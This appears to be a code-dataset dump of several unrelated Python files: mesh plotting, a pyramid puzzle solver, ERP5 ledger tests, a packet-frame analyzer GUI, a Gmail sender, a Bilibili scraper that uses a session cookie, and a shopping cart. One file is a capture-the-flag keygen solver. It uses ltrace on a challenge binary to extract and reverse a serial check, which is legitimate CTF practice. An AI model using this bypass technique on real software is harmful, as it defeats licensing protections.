self._plt_ps_normal_vecs(self.tri_mid*vtx_scl,self.tri_normal_vec*vec_scl,\n cp='#7D75FE',cnv='#1D1788',ax=ax) #light purple # dark purple \n return ax\n\n def _plt_vtx_normal_vec(self,vertices,vtx_scl=1,vec_scl=1,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax = self._plt_ps_normal_vecs(vertices*vtx_scl,self.vtx_normal_vec*vec_scl,\n cp='#f57dd7',cnv='#c20091',ax=ax) #light pink # dark pink\n return ax\n \n def _plt_fixed_vtx(self, vertices, fixed_vindex,**kwargs):\n ax = ax3d_handle(**kwargs)\n ax.scatter(vertices[fixed_vindex, 0],\n vertices[fixed_vindex, 1],\n vertices[fixed_vindex, 2], c='#780EB1') #purple\n return ax\n\n def plt_x(self, draw_type='tri', text_opt='off', scl=1, **kwargs):\n ax = self._plt_msh(self.x*scl, draw_type=draw_type, text_opt=text_opt, **kwargs)\n if self.fixed_vindex is not None:\n ax = self._plt_fixed_vtx(self.x*scl,self.fixed_vindex, ax=ax)\n return ax\n\n def plt_vtx(self, draw_type='tri', text_opt='off', scl = 1,**kwargs): \n ax = self._plt_msh(self.vertices*scl, draw_type=draw_type, text_opt=text_opt, **kwargs)\n return ax\n\n def _plt_msh(self, vertices, draw_type='tri', node_opt = 'on', text_opt='off', **kwargs):\n # draw_type = 'all', 'tri', 'tet', 'node'\n # text_opt = 'off', 'on'\n if draw_type == 'all':\n tri_opt = 'on'\n tet_opt = 'on'\n\n elif draw_type == 'tri':\n tri_opt = 'on'\n tet_opt = 'off'\n\n elif draw_type == 'tet':\n tri_opt = 'off'\n tet_opt = 'on'\n\n else:\n tri_opt = 'off'\n tet_opt = 'off'\n\n ax = ax3d_handle(**kwargs)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n\n # draw line\n if tet_opt == 'on': #blue\n if self.tet_line_segs is None:\n self._get_tet_line_segs()\n line_vt = np.hstack((vertices[self.tet_line_segs[:, 0]], vertices[self.tet_line_segs[:, 1]]))\n lc = Line3DCollection(line_vt.reshape(-1, 2, 3), colors='#6784ed')\n ax.add_collection(lc)\n\n if tri_opt == 'on': #green\n if self.tri_line_segs is None:\n self._get_tri_line_segs()\n line_vt = np.hstack((vertices[self.tri_line_segs[:, 0]], vertices[self.tri_line_segs[:, 1]])).copy()\n lc = Line3DCollection(line_vt.reshape(-1, 2, 3), colors='#6EBA58')\n ax.add_collection(lc)\n\n # draw node\n if node_opt == 'on':\n if tri_opt == 'on': #orange\n if self.surf_vindex is None:\n self.surf_vindex = 
np.unique(self.tri_elements)\n ax.scatter(vertices[self.surf_vindex, 0], vertices[self.surf_vindex, 1], vertices[self.surf_vindex, 2],\n marker='o', c='#eb8c23') \n if text_opt == 'on':\n for i in self.surf_vindex: ax.text(vertices[i, 0], vertices[i, 1], vertices[i, 2], f'{i}')\n else:\n ax.scatter(vertices[:, 0], vertices[:, 1], vertices[:, 2], marker='o', c='#eb8c23')\n if text_opt == 'on':\n for i in range(self.n_v): ax.text(vertices[i, 0], vertices[i, 1], vertices[i, 2], f'{i}')\n return ax\n","repo_name":"Kexin-Wei/Soft-tissue-deformation-in-laparoscopic-surgery-planning-with-DRL","sub_path":"env_pyrep/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21098185736","text":"# https://open.kattis.com/problems/pyramids\n\n'''\nwrite a program that computes how high a pyramid can be built \ngiven a certain number of blocks of stone.\n\n- side length that is two less than the one below it\n- The top layer always consist of a single block\n\nInput:\n - int n : number of blocks\n\nOutput: \n - int max_h : max height of a pyramid that can be built with at least n blocks.\n'''\n\nn = int(input())\n\nmax_h = 0\n\nside_start = 1\nwhile side_start**2 <= n:\n max_h += 1\n n -= side_start**2\n side_start += 2\n\n\nprint(max_h)","repo_name":"KhoiUna/icpc-practice","sub_path":"building_pyramids.py","file_name":"building_pyramids.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71227730803","text":"from Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom Products.ERP5Type.UnrestrictedMethod import UnrestrictedMethod\n\nclass PortalTypeOfPortalTypeTestCase(ERP5TypeTestCase):\n \"\"\"\n Base class to test Portal Types of other Portal Types\n \"\"\"\n def getBusinessTemplateList(self):\n return ('erp5_core', 'erp5_base', 'erp5_simulation', 'erp5_accounting')\n\n def setUpPropertyOnPortalType(self, portal_type_id, property_name, property_value):\n portal_type = self.portal.portal_types.get(portal_type_id, None)\n portal_type.setProperty(property_name, property_value)\n\n def cleanPropertyOnPortalType(self, portal_type_id, property_name):\n portal_type = self.portal.portal_types.get(portal_type_id, None)\n portal_type.setProperty(property_name, None)\n\n\nclass TestDeliveryTypeInformation(PortalTypeOfPortalTypeTestCase):\n \"\"\"\n Delivery Type is a Base Type on which a list of allowed ledgers is defined.\n This suite checks that its custom features are correctly implemented.\n \"\"\"\n\n def afterSetUp(self):\n self.createLedgerCategory()\n\n @UnrestrictedMethod\n def createLedgerCategory(self):\n portal_categories = self.portal.portal_categories\n ledger = self.portal.portal_categories.get('ledger', None)\n if ledger is None:\n ledger = portal_categories.newContent(portal_type='Base Category',\n id='ledger')\n\n accounting_ledger = ledger.get('accounting', None)\n if accounting_ledger is None:\n accounting_ledger = ledger.newContent(portal_type='Category',\n id='accounting')\n\n if accounting_ledger.get('general', None) is None:\n accounting_ledger.newContent(portal_type='Category', id='general')\n if accounting_ledger.get('detailed', None) is None:\n accounting_ledger.newContent(portal_type='Category', id='detailed')\n\n def testDefaultLedgerIsSetOnObjectIfSetOnPortalType(self):\n \"\"\"\n Sets up a list of ledger on the Accounting Transaction 
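A quick cross-check of the pyramid loop above: layer k counted from the top has side 2k-1, so a pyramid of height h consumes 1^2 + 3^2 + ... + (2h-1)^2 = h(2h-1)(2h+1)/3 blocks. A hedged closed-form variant (my own derivation, not part of the original solution):

def max_height(n):
    # Grow h while the next full pyramid still fits in n blocks.
    h = 0
    while (h + 1) * (2 * h + 1) * (2 * h + 3) // 3 <= n:
        h += 1
    return h

assert max_height(30) == 2   # 1 + 9 = 10 fits; 1 + 9 + 25 = 35 does not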
portal type,\n which is a DeliveryTypeInformation, and checks that new Accounting Transactions\n have a default ledger set at their creation\n \"\"\"\n portal_type = \"Accounting Transaction\"\n self.setUpPropertyOnPortalType(\n portal_type,\n \"ledger_list\",\n ['accounting/general', 'accounting/detailed'])\n\n self.assertEqual(self.portal.portal_types.get(portal_type).getDefaultLedger(),\n 'accounting/general')\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type)\n\n self.assertEqual(accounting_transaction.hasLedger(), True)\n self.assertEqual(accounting_transaction.getLedgerList(),\n ['accounting/general'])\n\n def testDefaultLedgerIsNotSetOnObjectIfNotSetOnPortalType(self):\n \"\"\"\n If no ledger is defined on the portal type, then it means the\n \"allowed ledger list\" feature is not in use in this instance\n \"\"\"\n portal_type = \"Accounting Transaction\"\n\n portal_type_object = self.portal.portal_types.get(portal_type)\n self.cleanPropertyOnPortalType(portal_type, 'ledger')\n # No ledger should be set on the portal type\n self.assertEqual(portal_type_object.getLedgerList(), [])\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type)\n\n self.assertEqual(accounting_transaction.getLedgerList(), [])\n\n def testDefaultLedgerIsOverwrittenByNewContentParameter(self):\n \"\"\"\n If a Delivery is created with a given ledger, then it should overwrite\n the default ledger\n \"\"\"\n portal_type = \"Accounting Transaction\"\n self.setUpPropertyOnPortalType(\n portal_type,\n \"ledger_list\",\n ['accounting/general', 'accounting/detailed'])\n\n self.assertEqual(self.portal.portal_types.get(portal_type).getDefaultLedger(),\n 'accounting/general')\n\n module = self.portal.getDefaultModule(portal_type)\n accounting_transaction = module.newContent(portal_type=portal_type,\n ledger='accounting/detailed')\n\n self.assertEqual(accounting_transaction.hasLedger(), True)\n self.assertEqual(accounting_transaction.getLedgerList(),\n ['accounting/detailed'])\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_accounting/TestTemplateItem/portal_components/test.erp5.testTypeDefinition.py","file_name":"test.erp5.testTypeDefinition.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"14414993644","text":"from pwn import *\n\ndef getCheck(iden):\n hasher = \"ltrace ./exec2 ./elf2.patch.bin %s %s 2>&1 > /dev/null | grep strcmp | sed 's/.*\\.\\.\\.\\, //' | sed 's/...) 
= .*//'\"\n h = process(hasher % (iden, 'f' * 32), shell=True)\n line = h.recvline()[1:][:-2]\n h.close()\n return line\n\ndef sendAnswer(p):\n from binascii import hexlify, unhexlify \n\n iden = p.recvline()[:-1]\n print(\"Checking for %s\" % iden)\n inp = unhexlify(getCheck(iden))\n data = [ord(inp[i]) ^ (i | i << 4) for i in range(len(inp))]\n data = [chr(data[i] & 0xf | data[0xf - i] & 0xf0) for i in range(len(inp))]\n data = ''.join(data)\n p.sendline(hexlify(data))\n p.recvuntil(\"OK\")\n p.recvline()\n print(\"Success!\")\n\n\np = remote('keygenme.ctfcompetition.com', 1337)\nwhile True:\n sendAnswer(p)\n","repo_name":"theKidOfArcrania/ctf-writeups","sub_path":"2018/gctfq/genkey/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"10353185102","text":"\r\nimport diction\r\nfrom analyse import *\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nimport os\r\n\r\ndef openfile():\r\n filepath = filedialog.askopenfilename(initialdir= os.getcwd(),\r\n title = \"choisissez une trame\",\r\n filetypes=((\"text files\", \"*.txt\"),\r\n (\"all files\", \"*.*\")))\r\n \r\n file = open(filepath, \"r\")\r\n for Widgets in fram1.winfo_children():\r\n Widgets.destroy()\r\n for Widgets in fram2.winfo_children():\r\n Widgets.destroy()\r\n print(filepath)\r\n filename = os.path.basename(filepath)\r\n print(filename)\r\n liste = clean_trames(filename)\r\n \r\n \r\n creat_button(liste)\r\n #obj.pack(clean_trames(filename))\r\n file.close()\r\n\r\ndef creat_button(liste):\r\n i=1\r\n for l in liste:\r\n t = str(i)+\"trame\"\r\n button = Button(fram1,\r\n text=t,\r\n command=lambda k=l,j=t\r\n :click(k,j),\r\n bg=\"green\")\r\n button.pack()\r\n i+=1\r\n\r\ndef creat_small_button(t,name):\r\n button = Button(fram1,\r\n text=t,\r\n command=lambda k=name:click_small_button(name),\r\n bg=\"yellow\")\r\n button.pack()\r\n\r\ndef click_small_button(t):\r\n \r\n os.startfile(t)\r\n\r\ndef show_label(t):\r\n label=Label(fram2,\r\n text=t)\r\n label.pack()\r\n\r\ndef write_res(text,name):\r\n with open(name+'.txt','w') as f:\r\n f.write(text)\r\n\r\ndef click(liste,t):\r\n \r\n res = \"\"\r\n res_ethernet, debut=Ethernet(liste, 0)\r\n \r\n res+=res_ethernet\r\n res_ip, fin_ip= IP(liste, debut)\r\n \r\n res+=res_ip\r\n res_udp,s_p,d=Couche_UDP(liste, fin_ip)\r\n \r\n res+=res_udp\r\n if s_p == 53:\r\n res_dns = DNS(liste,d)\r\n res+=res_dns\r\n res_dhcp = DHCP(liste,d)\r\n \r\n res+=res_dhcp\r\n t = t+\"_res\"\r\n write_res(res,t)\r\n creat_small_button(\"open \"+t,t+\".txt\")\r\n\r\ndef splitTrame(ficher):\r\n with open(ficher, \"r\") as f:\r\n bigTrame = f.read()\r\n splited = bigTrame.split('0000')\r\n splited.remove(\"\")\r\n for x in range(0,len(splited)):\r\n splited[x] = \"0000\" + splited[x]\r\n return splited\r\n\r\ndef checkOffset(a_trame, n):\r\n \r\n \r\n \r\n line1 = \"\"\r\n line2 = \"\"\r\n offset1 = 0\r\n offset2 = 0\r\n nbLine = 1\r\n trame_to_clean = []\r\n read_trame = a_trame.split(\"\\n\") \r\n \r\n while '' in read_trame:\r\n read_trame.remove('')\r\n while ' ' in read_trame:\r\n read_trame.remove(' ')\r\n \r\n\r\n nb_of_lines = len(read_trame)\r\n \r\n for x in range(0,nb_of_lines-1):\r\n line1 = read_trame[x]\r\n line2 = read_trame[x + 1]\r\n\r\n \r\n offset1 = line1.split()[0]\r\n if len(offset1) != 4:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", the offset is 
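The XOR-then-nibble-swap in sendAnswer() above is written for Python 2, where indexing a string yields one-character strings. A hedged Python 3 re-expression of the same transform (assuming the 16-byte blocks the challenge uses, since positions are mirrored around index 0x0F):

def decode(inp: bytes) -> bytes:
    # Per-byte XOR with (i | i << 4), then recombine the low nibble of
    # position i with the high nibble of the mirrored position 0x0F - i.
    xored = [inp[i] ^ (i | i << 4) for i in range(len(inp))]
    return bytes((xored[i] & 0x0F) | (xored[0x0F - i] & 0xF0)
                 for i in range(len(inp)))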
incorret\")\r\n return \"\"\r\n offset2 = line2.split()[0]\r\n if len(offset2) != 4:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine+1)+ \", the offset is incorret\")\r\n \r\n return \"\"\r\n if isHex(offset1)==False :\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ \"the offset is in wrong format\")\r\n \r\n\r\n return \"\"\r\n if isHex(offset2)==False:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine+1)+ \", \"+ \"the offset is in wrong format\")\r\n \r\n\r\n return \"\"\r\n diff = int(offset2,16) - int(offset1,16)\r\n \r\n \r\n if diff <= 0:\r\n show_label(\"Problem found in trame\" + str(n) + \"line \"+ str(nbLine)+ \", \"+ \"the offset is incorret\")\r\n \r\n return \"\"\r\n \r\n \r\n \r\n trame_to_clean.append(line1)\r\n\r\n line1 = line2\r\n nbLine = nbLine + 1 \r\n\r\n \r\n last_line = read_trame[nb_of_lines-1]\r\n trame_to_clean.append(last_line)\r\n \r\n\r\n \r\n\r\n nb_of_lines = len(trame_to_clean)\r\n nbLine = 1\r\n for x in range(0,nb_of_lines-1):\r\n line1 = trame_to_clean[x]\r\n line2 = trame_to_clean[x + 1]\r\n \r\n offset1 = line1.split()[0]\r\n offset2 = line2.split()[0]\r\n diff = int(offset2,16) - int(offset1,16)\r\n \r\n word_list_line1 = line1.split()\r\n for t in range (1,len(word_list_line1)):\r\n if isHex(str(t)) == False:\r\n show_label(\"this trame is in wrong format\")\r\n return \"\"\r\n number_of_words_in_line1 = len(word_list_line1)\r\n \r\n if (diff > 0):\r\n if number_of_words_in_line1 < diff + 1:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ str(diff - number_of_words_in_line1 + 1)+ \"byte are missing\")\r\n \r\n return \"\"\r\n elif number_of_words_in_line1 > diff + 1:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ str(number_of_words_in_line1 + 1 - diff)+ \" byte more\")\r\n \r\n return \"\"\r\n else:\r\n words=line1.split()\r\n words = words[0:diff+1]\r\n line1 = \" \".join(words)\r\n trame_to_clean[x] = line1\r\n \r\n\r\n line1 = line2\r\n nbLine = nbLine + 1 \r\n \r\n\r\n\r\n \r\n return trame_to_clean\r\n\r\ndef cut_into_bytes(trame):\r\n for x in range(0, len(trame)):\r\n trame[x].split(' ', 1)\r\n trame[x] = trame[x].split(' ', 1)[1]\r\n \r\n trame = \" \".join(trame)\r\n \r\n trame = trame.split(\" \")\r\n while '' in trame:\r\n trame.remove('')\r\n while ' ' in trame:\r\n trame.remove(' ')\r\n \r\n return trame\r\n\r\ndef rebuild_trame(trames):\r\n while '' in trames:\r\n trames.remove('')\r\n while ' ' in trames:\r\n trames.remove(' ')\r\n \r\n return trames\r\n\r\ndef clean_trames(ficher):\r\n splited = splitTrame(ficher)\r\n \r\n for x in range (0,len(splited)):\r\n \r\n splited[x] = checkOffset(splited[x], x+1)\r\n \r\n if splited[x] != \"\":\r\n splited[x] = cut_into_bytes(splited[x])\r\n \r\n splited = rebuild_trame(splited)\r\n \r\n return splited\r\n\r\n\r\ndef isHex(s):\r\n hexNumber = set(\"0123456789abcdefABCDEF\")\r\n for char in s:\r\n if not (char in hexNumber):\r\n return False\r\n return True \r\n\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"700x600\")\r\nwindow.title(\"Analyseur des trames\")\r\n\r\n\r\n\r\nmenubar = Menu(window)\r\nwindow.config(menu=menubar)\r\nfile_menu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"file\", menu = file_menu)\r\nfile_menu.add_command(label=\"Open\", command=openfile)\r\nfile_menu.add_separator()\r\nfile_menu.add_command(label=\"Exit\", command=quit)\r\n\r\npanedwindow=ttk.Panedwindow(window, orient=HORIZONTAL) 
\r\npanedwindow.pack(fill=BOTH, expand=True) \r\n \r\nfram1=ttk.Frame(panedwindow,width=100,height=300, relief=SUNKEN) \r\nfram2=ttk.Frame(panedwindow,width=390,height=390,relief=SUNKEN) \r\n \r\npanedwindow.add(fram1, weight=1) \r\npanedwindow.add(fram2, weight=1) \r\n \r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"Yukhoi/Python_Analyseur-de-Protocoles-Reseau-Offline","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19117406851","text":"import smtplib\nfrom email.mime.text import MIMEText\n\nheader = 'Hello. This is an automated email.\\n\\n'\n\ndef send(subject, to, frm, text):\n # The message to send\n msg = MIMEText(header + text)\n msg['Subject'] = subject\n msg['To'] = to\n msg['From'] = frm\n\n # Connect to gmail's email server and send\n s = smtplib.SMTP('smtp.gmail.com', port=587)\n s.ehlo()\n s.starttls()\n s.login(user=frm, password='password')\n s.sendmail(frm, [to], msg.as_string())\n s.quit()\n\nif __name__ == \"__main__\":\n send(\n subject='A coupon for you!',\n to='billgates@microsoft.com',\n frm='JohnnysHotDogs1@gmail.com',\n text='Enjoy!')","repo_name":"M1-CHAEL/Introduction-To-Programming-In-Python-C859","sub_path":"Labs/Chp11-Modules/Send-gmail.py","file_name":"Send-gmail.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21539157515","text":"import requests\nimport json\n\n# # 创建 session 方法\n# session = requests.session()\n# # 请求登录\n# print(\"**********登录模块**********\")\n# login_API = 'http://passport.bilibili.com/qrcode/getLoginUrl'\n# login_headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"\n# }\n# login_info_resp = requests.get(login_API, headers=login_headers)\n# login_info_data = login_info_resp.text\n# # 返回Python类型\n# login_info_data = json.loads(login_info_data)\n# # 取出登录链接\n# login_check_link = login_info_data['data']['url']\n# login_check_oauthKey = login_info_data['data']['oauthKey']\n# # 生成二维码以供登录\n# qrcode_img = qrcode.make(login_check_link)\n# qrcode_img.save('./img/login.png')\n# # 展示二维码\n# print(\"请按任意键完成登录...\")\n# login_qrcode = cv.imread(\"./img/login.png\")\n# cv.imshow(\"bilibili-qrcode_login\", login_qrcode)\n# cv.waitKey(0)\n# cv.destroyAllWindows()\n#\n# # 获得cookie\n# tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'\n# 等待输入case_id\n# 读取 cookie.txt\nwith open(\"./cookie.txt\", \"r\") as doc:\n bili_cookie = doc.read()\n if bili_cookie == '':\n print(\"状态:\")\n print(\"cookie.txt 文件为空!\")\n print(\"请根据引导操作:\")\n print(\"请打开处于B站登录态的浏览器,按F12,找到控制台(console),在其中输入 document.cookie \")\n print(\"将控制台输出的结果完整复制到文件夹内的cookie.txt文件中,并保存\")\n print(\"请执行操作!程序即将退出!\")\n exit()\n else:\n print(\"状态:cookie获取完成!\")\n# 请求输入案件id\ncase_id = input(\"请输入需要查询的案件id:\")\n\n# headers 及各项API初始化\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\",\n \"cookie\": bili_cookie\n}\n# 案件详情\njudge_API = 'https://api.bilibili.com/x/credit/v2/jury/case/info?case_id={}'.format(case_id)\n# 众议观点(因后台控制,不可抓取前端不可见内容)\njudge_content_API = 'https://api.bilibili.com/x/credit/v2/jury/case/opinion?case_id={}'.format(case_id)\n# response\njudge_info_resp = requests.get(judge_API, headers=headers)\njudge_info_data = 
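One caveat worth flagging on send() above: the Gmail password is hardcoded as a literal. A hedged variant of the login step that reads it from the environment instead (the variable name is my invention, not from the original):

import os
import smtplib

s = smtplib.SMTP('smtp.gmail.com', port=587)
s.ehlo()
s.starttls()
s.login(user='JohnnysHotDogs1@gmail.com',
        password=os.environ['GMAIL_APP_PASSWORD'])  # hypothetical env var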
judge_info_resp.text\n# 返回Python类型\njudge_info_data = json.loads(judge_info_data)\n# API状态解析\njudge_info_code = judge_info_data['code'] # 服务器在json中返回的状态码\njudge_info_status = judge_info_data['message'] # 服务器在json中返回的状态message\nprint(\"请求状态:\", judge_info_code, judge_info_status)\n# 开始 json 解析\n# 注:存在一个case_id\n# type = 1 AC14x411c74g\n# type = 2 AC18x411c7Px\n# type = 3 AC1bx411c7fi\n# type = 4 AC14x411c7Kz\ncase_type = judge_info_data['data']['case_type'] # 1:单条评论 2:评论氛围 3:单条弹幕 4:弹幕氛围\ncase_avid = judge_info_data['data']['avid'] # AV号\ncase_cid = judge_info_data['data']['cid'] # cid\ncase_vote_cd = judge_info_data['data']['vote_cd'] # 投票冷却时间\ncase_result_text = judge_info_data['data']['result_text'] # 系统综合结果\ncase_content_title = judge_info_data['data']['title'] # 稿件标题\n\n# case_info 对应的参数\n# 在case_type = 1 时的情形\nif case_type == 1:\n case_type_desc = '单条评论' # 对case类型的描述\n case_uname = judge_info_data['data']['case_info']['comment']['uname'] # type=1\n case_content = judge_info_data['data']['case_info']['comment']['content'] # type=1\n case_child_comments = judge_info_data['data']['case_info']['child_comments'] # type=1\n case_danmaku_img = '不支持' # type=4\n# 在case_type = 2 时的情形\n# elif case_type == 2:\n\n# 在case_type = 3 时的情形\nelif case_type == 3:\n case_type_desc = '单条弹幕'\n case_uname = '不支持'\n case_content = judge_info_data['data']['case_info']['single_danmu']['content']\n case_chiled_comments = '不支持'\n# 在case_type = 4 时的情形\nelif case_type == 4:\n case_type_desc = '弹幕氛围' # 对case类型的描述\n case_uname = '不支持' # type=1\n case_content = '不支持' # type=1\n case_child_comments = '不支持' # type=1\n case_danmaku_img = judge_info_data['data']['case_info']['danmu_img'] # type=4\n\n# 投票情况\ncase_all_opinion = judge_info_data['data']['vote_info']['all_count']\ncase_good_opinion = judge_info_data['data']['vote_info']['counts'][0]\ncase_normal_opinion = judge_info_data['data']['vote_info']['counts'][1]\ncase_bad_opinion = judge_info_data['data']['vote_info']['counts'][2]\ncase_denied_opinion = judge_info_data['data']['vote_info']['counts'][3]\n\n# 抓取众议观点基础参数\njudge_content_resp = requests.get(judge_content_API, headers=headers)\njudge_content_data = judge_content_resp.text\n# 返回Python类型\njudge_content_data = json.loads(judge_content_data)\n# 众议观点总数\ncase_comment_num = int(judge_content_data['data']['total'])\n# 每页只有20条众议观点\nif case_comment_num % 20 != 0:\n page = int((case_comment_num - case_comment_num % 20) / 20 + 1)\nelse:\n page = int(case_comment_num / 20)\n# 数值初始化\nr = 0\npage_num = 1\ntimes = 0\n# 输出\nprint(\"**********************************************************************\")\nprint(\"案件简介:\")\nprint(\"案件类型:\", case_type_desc, \"案件类型id:\", case_type)\nprint(\"案件标题:\", case_content_title, '|', \"AV号:\", case_avid, \"cid:\", case_cid)\nprint(\"----------------------------------------------------------------------\")\nprint(\"案件详情:\")\nprint(\"涉案角色昵称:\", case_uname, \"涉案评论:\", case_child_comments)\nprint(\"涉案弹幕截图:\", case_danmaku_img)\nprint(\"投票冷却时间:\", case_vote_cd, \"秒\")\nprint(\"----------------------------------------------------------------------\")\nprint(\"投票情况:\")\nprint(\"总投票数:\", case_all_opinion)\nprint(\"好:\", case_good_opinion, \"普通:\", case_normal_opinion, \"差:\", case_bad_opinion, \"无法判断:\", case_denied_opinion)\nprint(\"----------------------------------------------------------------------\")\nprint(\"众议观点:\")\nfor page in range(1, page + 1):\n comment_API = 'https://api.bilibili.com/x/credit/v2/jury/case/opinion?case_id={}&pn={}&ps=20'.format(case_id, page_num)\n comment_resp = 
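The page arithmetic above (splitting case_comment_num into 20-item pages) collapses to a ceiling division; an equivalent one-liner for reference:

# page = (case_comment_num + 19) // 20
assert (20 + 19) // 20 == 1 and (21 + 19) // 20 == 2 and (40 + 19) // 20 == 2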
requests.get(comment_API, headers=headers)\n comment_data = json.loads(comment_resp.text)\n r_max = len(comment_data['data']['list'])\n print('=====当前是第', page_num, '页=====')\n for r in range(0, r_max):\n comment_opid = comment_data['data']['list'][r]['opid']\n comment_mid = comment_data['data']['list'][r]['mid']\n comment_uname = comment_data['data']['list'][r]['uname']\n comment_vote_text = comment_data['data']['list'][r]['vote_text']\n comment_content = comment_data['data']['list'][r]['content']\n comment_anonymous = comment_data['data']['list'][r]['anonymous']\n if comment_anonymous == 0:\n comment_anonymous = '实名'\n else:\n comment_anonymous = '匿名'\n comment_like = comment_data['data']['list'][r]['like']\n comment_hate = comment_data['data']['list'][r]['hate']\n print(\"*****这是第\", times + 1, \"条评论****\")\n print(\"opid:\", comment_opid, \"|\", \"uid:\", comment_mid)\n print(\"发送者:\", comment_uname, \"|\", \"状态:\", comment_anonymous)\n print(\"众议观点:\", comment_vote_text, \"众议内容:\", comment_content)\n print(\"赞:\", comment_like, \"|\", \"踩:\", comment_hate)\n times = times + 1\n page_num = page_num + 1\n # 如遇管控策略,导致计算出的页数和实际数量不符,则结束程序\n if len(comment_data['data']['list']) == 0:\n break","repo_name":"AlanStar233/Bilibili-tools","sub_path":"judgement_info.py","file_name":"judgement_info.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20301738601","text":"import datetime\nimport exception\nimport product as product_module\n\n\nclass ShoppingCart:\n def __init__(self):\n self.items = {}\n\n def add_item(self, product, quantity=1):\n if type(product) is not product_module.Product:\n raise exception.IncorrectTypeError('This is not a product.')\n if type(quantity) is not int:\n raise exception.IncorrectTypeError('Quantity must be int.')\n if quantity < 1:\n raise exception.UnallowedValueError('Quantity must be positive.')\n try:\n self.items[product] += quantity\n except KeyError:\n self.items[product] = quantity\n\n def remove_item(self, product):\n if type(product) is not product_module.Product:\n raise exception.IncorrectTypeError('This is not a product.')\n try:\n del self.items[product]\n except KeyError:\n return False\n return True\n\n def total(self):\n result = 0\n for product, quantity in self.items.items():\n result += product.get_price(quantity)\n return result\n\n def receipt(self, *, width=50):\n if type(width) is not int:\n raise exception.IncorrectTypeError('Width must be int.')\n\n # ---------------- Calculate column sizes --------------------------\n if width < 26: # minimum for date + time\n width = 26\n min_name_width = 8\n min_quantity_width = 5\n min_price_width = 7\n total = self.total()\n price_width = len('{:.2f}'.format(total)) + 2\n if price_width < min_price_width:\n price_width = min_price_width\n quantity_width = 0\n for _, quantity in self.items.items():\n if len(str(quantity)) > quantity_width:\n quantity_width = len(str(quantity))\n quantity_width += 2\n if quantity_width < min_quantity_width:\n quantity_width = min_quantity_width\n name_width = width - (price_width + quantity_width + 3)\n if name_width < min_name_width:\n name_width = min_name_width\n width = name_width + quantity_width + price_width + 3\n\n # ---------------- Define helping functions ------------------------\n def add_line(*, name_area='-', quantity_area='', price_area=''):\n if name_area == '-': # spacer line\n return (\n '+' + '-' * (name_width + quantity_width) + '+' +\n '-' * 
price_width + '+' + '\\n'\n )\n else: # actual content\n chunk = len(name_area)\n chunk_size = (name_width - 1)\n\n # split name area field into chunks to fit in name width\n name_parts = [\n name_area[i:i + chunk_size]\n for i in range(0, chunk, chunk_size)\n ]\n result = (\n '|' + ' ' + name_parts[0].ljust(name_width - 1) +\n quantity_area.rjust(quantity_width - 1) + ' ' + '|' +\n price_area.rjust(price_width - 1) + ' ' + '|' + '\\n'\n ) # put 1st chunk with quantity and price info\n for part in name_parts[1:]:\n result += (\n '|' + ' ' + part.ljust(name_width - 1) +\n ' ' * quantity_width + '|' +\n ' ' * price_width + '|' + '\\n'\n ) # leave rest of chunks without\n return result\n\n def add_footer(): # adds date and time\n result = '|'\n result += (\n 'Date: ' + str(datetime.datetime.now())[:-10]\n ).center(width - 2)\n result += '|' + '\\n'\n result += '+' + '-' * (width - 2) + '+'\n return result\n\n # ---------------- Add column names --------------------------------\n result = add_line()\n result += add_line(\n name_area='Product',\n quantity_area='qty',\n price_area='price'\n )\n result += add_line()\n\n # ---------------- Add products ------------------------------------\n for product, quantity in self.items.items():\n normal_price = product.price * quantity\n result += add_line(\n name_area=product.name,\n quantity_area=str(quantity),\n price_area='{:.2f}'.format(normal_price)\n )\n if product.promotion:\n result += add_line(\n name_area=' ' + product.promotion.receipt_message(),\n price_area='{:.2f}'.format(\n product.get_price(quantity) - normal_price)\n )\n\n # ---------------------- rest --------------------------------------\n result += add_line()\n result += add_line(\n name_area='Total',\n price_area='{:.2f}'.format(total)\n )\n result += add_line()\n result += add_footer()\n return 